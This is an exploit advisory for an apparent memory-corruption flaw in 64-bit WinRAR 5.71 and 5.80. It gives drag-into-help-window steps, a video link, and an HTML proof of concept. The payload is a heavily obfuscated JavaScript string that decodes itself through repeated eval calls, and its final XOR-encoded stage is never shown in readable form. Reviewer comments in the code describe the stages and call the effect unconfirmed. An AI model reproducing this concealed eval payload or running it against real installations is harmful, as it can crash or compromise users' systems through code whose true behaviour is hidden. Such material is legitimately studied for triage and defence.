winrar 5.71 & 5.80 64bit memory corruption

2019.10.22
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: [winrar 5.71 & 5.80 64bit memory corruption]
# Exploit Author: albalawi -s
# Software Link: [https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe]
# Version: [5.80]
# Tested on: [Microsoft Windows Version 10.0.18362.418 64bit]
#https://twitter.com/test_app_______
------------------------------------------------
1- open winrar or any file.rar
2- help
3- help topics
4- Drag the exploit to the window
poc video: https://www.youtube.com/watch?v=NVDVP33kHuU
--------------------------------------------------
Save the content html
******************************************
<script type="text/javascript">
//<![CDATA[
<!--
// Review note: the literal below is a chain of string-encoded stages. The
// `while(x=eval(x));` loop after it evaluates x, stores the result back in x,
// and repeats until a stage evaluates to a falsy value.
// Stage 1 (readable at the start of the literal) defines f(x), which returns
// its argument reversed, and applies it to the rest of the literal.
// Stage 2 is therefore readable backwards at the end of the literal: another
// f(x) that, for as long as x.charCodeAt(l/13) is not 47, doubles x and l
// inside a try/catch that discards errors, then reverses x and returns the
// first ol characters (ol being the original length).
// NOTE(review): if that check never passes in the host's script engine, x
// grows without bound, which would surface as memory exhaustion rather than a
// controlled write -- not confirmed from this page; the advisory lists no CVE.
// The f(x,y) defined near the start XORs each character code with a running
// counter reduced modulo 127; its output is not decoded here.
// NOTE(review): the CDATA/`<!--` wrapper and stage layout resemble output of
// the Hivelogic Enkoder obfuscator -- TODO confirm.
// For triage, decode offline by capturing each stage as text instead of
// passing it to eval.
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
"\\\\,l=x.length;for(i=0;i<l;i++){y%=127;o+=String.fromCharCode(x.charCodeAt" +
"(i)^(y++));}return o;}f(\\\"\\\\K_RG^Q[B\\\\\\\\031OKSOYQP\\\\\\\\027b}*7))" +
"x\\\\\\\\033:\\\\\\\\025$w!(:.p9&'$x3&-0,f\\\\\\\\000\\\\\\\\177&r\\\\\\\\0" +
"25\\\\\\\\000O\\\\\\\\000\\\\\\\\013\\\\\\\\010\\\\\\\\026\\\\\\\\006\\\\\\" +
"\\034\\\\\\\\000\\\\\\\\010\\\\\\\\007\\\\\\\\t1LO\\\\\\\\023\\\\\\\\036\\\\"+
"\\\\034\\\\\\\\007\\\\\\\\021\\\\\\\\033\\\\\\\\002J$[3>AE\\\\\\\\\\\"\\\\\\"+
"\\\\\\\\\"\\\\?^qXk:jm}k+dyz\\\\\\\\177=tcf}c+K:\\\\\\\\\\\\\\\\bkuo{l|\\\\" +
"\\\\003\\\\\\\\002@KKRBF]\\\\\\\\027w\\\\\\\\016\\\\\\\\000\\\\\\\\037s\\\\" +
"\\\\022\\\\\\\\017nAh[\\\\\\\\nUW]C\\\\\\\\005`ObQ|2!1-52g$($,9,)*m\\\\\\\\" +
"rp\\\\\\\\005\\\\\\\\026\\\\\\\\0065%1).u\\\\\\\\0313=0\\\\\\\\004\\\\\\\\0" +
"04>AZ9\\\\\\\\024;\\\\\\\\0065\\\\\\\\0307\\\\\\\\002MNO4\\\\\\\\030\\\\\\\\"+
"037S\\\\\\\\007\\\\\\\\035\\\\\\\\032WX%\\\\\\\\010'\\\\\\\\022]^ Rgw$vnk(4" +
"*H~ho{u^pyqvb?D;Mh\\\\\\\\177owoT\\\\\\\\017qKAIJ{\\\\\\\\n\\\\\\\\000\\\\\\"+
"\\n\\\\\\\\013p_rA\\\\\\\\020\\\\\\\\021\\\\\\\\022pUYZ\\\\\\\\027KQV\\\\\\" +
"\\025nHP\\\\\\\\027\\\\\\\\034c\\\\\\\\036a\\\\\\\\030g%*,g/3)\\\\\\\\021l\\"+
"\\\\\\023r\\\\\\\\rpztu\\\\\\\\n%\\\\\\\\0047z{|\\\\\\\\016;+@\\\\\\\\022\\" +
"\\\\\\n\\\\\\\\017DXF)\\\\\\\\007\\\\\\\\035\\\\\\\\002\\\\\\\\002\\\\\\\\0" +
"02\\\\\\\\nNOPQ.\\\\\\\\001(\\\\\\\\033VWX%\\\\\\\\010'\\\\\\\\022AQsbpjtq8" +
"[zUd7\\\\\\\\177n|f`e2gmes*D;n~di1uAWCPGWOW\\\\\\\\\\\\\\\\u\\\\\\\\010\\\\" +
"\\\\025p_rAVD\\\\\\\\\\\\\\\\P@\\\\\\\\\\\\\\\\YY\\\\\\\\030\\\\\\\\\\\\\\\\"+
"B\\\\\\\\023\\\\\\\\025\\\\\\\\035Ec2\\\\\\\\035,\\\\\\\\03703'5h+?-*(<omq\\"+
"\\\\\\016q\\\\\\\\010wm\\\\\\\\013*\\\\\\\\0054\\\\\\\\007(;1-@I\\\\\\\\024" +
"\\\\\\\\002\\\\\\\\026E\\\\\\\\017GUIZPL\\\\\\\\004NSPDBCDEFGCY\\\\\\\\023P" +
"WT^{]p_jYr[|k\\\\\\\\177mjh|/;,2O6m\\\\\\\\\\\"\\\\&D;!GnApCT\\\\\\\\\\\\\\" +
"\\~QxKzS^HX\\\\\\\\013NXHIUC\\\\\\\\000\\\\\\\\023\\\\\\\\t\\\\\\\\025TB^__" +
"I\\\\\\\\007aLc.\\\\\\\\0356%+7fo!iwk|vn&pmrfdefgcy3pwt~$<\\\\\\\\023>\\\\\\"+
"\\r8\\\\\\\\021:\\\\\\\\023\\\\\\\\n\\\\\\\\034\\\\\\\\014\\\\\\\\r\\\\\\\\" +
"t\\\\\\\\037\\\\\\\\\\\\\\\\O[LR\\\\\\\\021\\\\\\\\001\\\\\\\\023\\\\\\\\02" +
"0\\\\\\\\022\\\\\\\\nB&\\\\\\\\t \\\\\\\\023\\\\\\\\\\\"\\\\t|^qXkZslfi~ah`" +
"{>e{gxp6*8{o}zxl-\\\\\\\\033}P\\\\\\\\177JXzUtG\\\\\\\\026\\\\\\\\004_N\\\\" +
"\\\\\\\\\\\\F@E\\\\\\\\014\\\\\\\\017\\\\\\\\033]SV\\\\\\\\\\\\\\\\\\\\\\\\" +
"007\\\\\\\\006YSYG\\\\\\\\037//.,%!{\\\\\\\\033j,2ce\\\\\\\\021lq\\\\\\\\01" +
"4#\\\\\\\\016=hz7i\\\\\\\\004+\\\\\\\\0065`r<0\\\\\\\\004\\\\\\\\030\\\\\\\\"+
"\\\\\\\\?\\\\\\\\0269\\\\\\\\010[G\\\\\\\\001\\\\\\\\036\\\\\\\\006\\\\\\\\" +
"000SLFKAI\\\"\\\\,47)\\\"(f};)lo,0(rtsbus.o nruter};)i(tArahc.x=+o{)--i;0=>" +
"i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)74=!)31/l(tAedoCrahc.x(elihw;lo=l,ht" +
"gnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\")" ;
// Evaluates the current stage and loops again while the result is truthy.
while(x=eval(x));
//-->
//]]>
</script>

